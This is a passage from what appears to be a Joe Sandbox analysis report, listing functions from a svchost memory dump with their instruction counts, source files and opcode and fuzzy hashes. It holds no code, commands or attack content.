                                                                                          • Instruction Fuzzy Hash: 3461AD70E04219CFDB15EBB9D4586EEBFF2EF89740F1481AED405AB244DB709945CBA0
                                                                                          Function 057C07F3 Relevance: .1, Instructions: 145COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65e4e37c102ef065a8f9c5dfce483ec870253b5c40cc2e5c5b5ae9d32daee08a
                                                                                          • Instruction ID: 6ca69c009af8a134679a31d6f3b09dab0ea4789e8a31b93244ab49f972d59fc6
                                                                                          • Opcode Fuzzy Hash: 65e4e37c102ef065a8f9c5dfce483ec870253b5c40cc2e5c5b5ae9d32daee08a
                                                                                          • Instruction Fuzzy Hash: 2051FA74B00615CFDB04DF69C898BADBBF2BF89710F1580A9E905AB361DB31E841DB90
                                                                                          Function 057C0838 Relevance: .1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c121416030a6ae4bb6f67fd735280ab0e288af965bc0a22e7f556f888dcf226
                                                                                          • Instruction ID: 682632a3650f2919c3dda7b63c660886c9df20811bd87a9d58c5a3ea1237fe3f
                                                                                          • Opcode Fuzzy Hash: 7c121416030a6ae4bb6f67fd735280ab0e288af965bc0a22e7f556f888dcf226
                                                                                          • Instruction Fuzzy Hash: 30510C34B00605CFDB14DF69C958BADBBB6BF89710F1580A9E905AB361DB31DC01CB90
                                                                                          Function 057C1DE8 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 30d1db1d280a03e1e56c22b6c8f85f6c64c3baa99042d0e2f2b72e16b494c2b9
                                                                                          • Instruction ID: b071302460d511acd512b6c2cb8d6e31d3eaa007312738d54801577aef410981
                                                                                          • Opcode Fuzzy Hash: 30d1db1d280a03e1e56c22b6c8f85f6c64c3baa99042d0e2f2b72e16b494c2b9
                                                                                          • Instruction Fuzzy Hash: 6431F530B022968FCB48DB78885467EBBF2BFC6201B5484BDD505DB386DE348C02D7A1
                                                                                          Function 057C1DD8 Relevance: .1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa05e1128389ac21454552ae449158b5a09908be76c0e958f36d8f6de6645850
                                                                                          • Instruction ID: c31407f4b0d5b2a1647cc8067ea1a2499cfc1a8c6e69e41e740cfeb63046b1ee
                                                                                          • Opcode Fuzzy Hash: aa05e1128389ac21454552ae449158b5a09908be76c0e958f36d8f6de6645850
                                                                                          • Instruction Fuzzy Hash: 3D21D130B012568FDB58DB78985477EBBE2AFCA201F1484BDD405EB385EE348D02D7A1
                                                                                          Function 057C1CC8 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a736ee2ca61950d7a42c093f51020ab6a8efe52c43908cdc7fe5020682da93ac
                                                                                          • Instruction ID: 0bb91dca826ef9e98114cdc78473f4cde3d33451b9e078ea75716b07a041b516
                                                                                          • Opcode Fuzzy Hash: a736ee2ca61950d7a42c093f51020ab6a8efe52c43908cdc7fe5020682da93ac
                                                                                          • Instruction Fuzzy Hash: 49219F65F052458FDB04EBF9882836EBEEAEFC9300B14456DD54AD7386DE748C0187A1
                                                                                          Function 057C1BAB Relevance: .1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 949aa10ea18afb13e4a0299e4d9419f3c01be88253b65b72aa35c192746586aa
                                                                                          • Instruction ID: 8124181cce9f91535af74bfb1314409235b0d25e6d16a56339fbda95eca675e8
                                                                                          • Opcode Fuzzy Hash: 949aa10ea18afb13e4a0299e4d9419f3c01be88253b65b72aa35c192746586aa
                                                                                          • Instruction Fuzzy Hash: E2312C34E0024ADFDB04EBB8E858AADBFB2EB85300F5045ADD501AB351EB749951CB51
                                                                                          Function 057C1BB8 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d86bde14d1f5b6d23ec49512a4cc5169688f4760634df805842ac3126811495
                                                                                          • Instruction ID: 714df16abfe7acf357ee67ec1331b1af69ccc17f87532ca1dc358147218647cd
                                                                                          • Opcode Fuzzy Hash: 7d86bde14d1f5b6d23ec49512a4cc5169688f4760634df805842ac3126811495
                                                                                          • Instruction Fuzzy Hash: 02213234E0024ADFDB04EBB8E8586ADBFB2EFC5300F5045ADD505A7341EB746951CB51
                                                                                          Function 057C22D9 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5180e3cd75f68b732acbe530f89fbdb3ae3f4190bf154a9999dc7b2e9ebdeed1
                                                                                          • Instruction ID: d43ab3024d107170369b1c0986c05c1e5b98a93ba19d0cf8d66f7fd789de8c05
                                                                                          • Opcode Fuzzy Hash: 5180e3cd75f68b732acbe530f89fbdb3ae3f4190bf154a9999dc7b2e9ebdeed1
                                                                                          • Instruction Fuzzy Hash: D5110A74E0220ADFCB04EFA8F8556EDBBB1EB84205F0056ADC509AB640EB756A458F40
                                                                                          Function 057C22E8 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83c7f95638134b9d083725f25a92b8c21172dc13eb8fa941d16f7f3138cd0e83
                                                                                          • Instruction ID: ade854816cb136e078aefbbf223ea87b0dcf8a8bfd5eb8feb1d198f636a74410
                                                                                          • Opcode Fuzzy Hash: 83c7f95638134b9d083725f25a92b8c21172dc13eb8fa941d16f7f3138cd0e83
                                                                                          • Instruction Fuzzy Hash: 6411E874F0220ADFCB44EFA8E8545ADBBB1EB84200B0056A9C519AB244DB756A458F40
                                                                                          Function 057C0A78 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4d275b1e1d9ffcc9b22282d1f93db3806a9dc6446a1c2ba410d3be5c13cfb5b
                                                                                          • Instruction ID: 8812d5f5ec749310e30421074913b0f0cb96ca10c54244451ffa6a7f8c9bf756
                                                                                          • Opcode Fuzzy Hash: b4d275b1e1d9ffcc9b22282d1f93db3806a9dc6446a1c2ba410d3be5c13cfb5b
                                                                                          • Instruction Fuzzy Hash: FDE09230A0620AEFC700DFF8EC819ACBBB4EF86300B1046DAC808D7202DB352E10DB40
                                                                                          Function 057C0A48 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18bf58635585122da85d5dbb2b54dbd492f2afe25bfb93bbad079f3e02d52f6c
                                                                                          • Instruction ID: 41ce851492d071dd2e294e97e34780dd41f8b012a9bbb0b59cf653fdbe3df6f4
                                                                                          • Opcode Fuzzy Hash: 18bf58635585122da85d5dbb2b54dbd492f2afe25bfb93bbad079f3e02d52f6c
                                                                                          • Instruction Fuzzy Hash: C1D05E307162A68EC7265BF454184AE6B605E82A4831404BED449CB273EA368952D7D4
                                                                                          Function 057C0A88 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2743751287.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_57c0000_svchost.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8f2e8afdb795b47cda62e8af1e98f066c6f9b9d49e547bfd0f3d47c73543e5d
                                                                                          • Instruction ID: 2e3997f7638b1e2c03d44fa95b2c6c9d24890bb9346dfda9d341d472efa915d0
                                                                                          • Opcode Fuzzy Hash: c8f2e8afdb795b47cda62e8af1e98f066c6f9b9d49e547bfd0f3d47c73543e5d
                                                                                          • Instruction Fuzzy Hash: 1FD05B70E0210DEFCB00DFB8E90155DBBF5DB45200B1146DDD908D7301DA316F009B44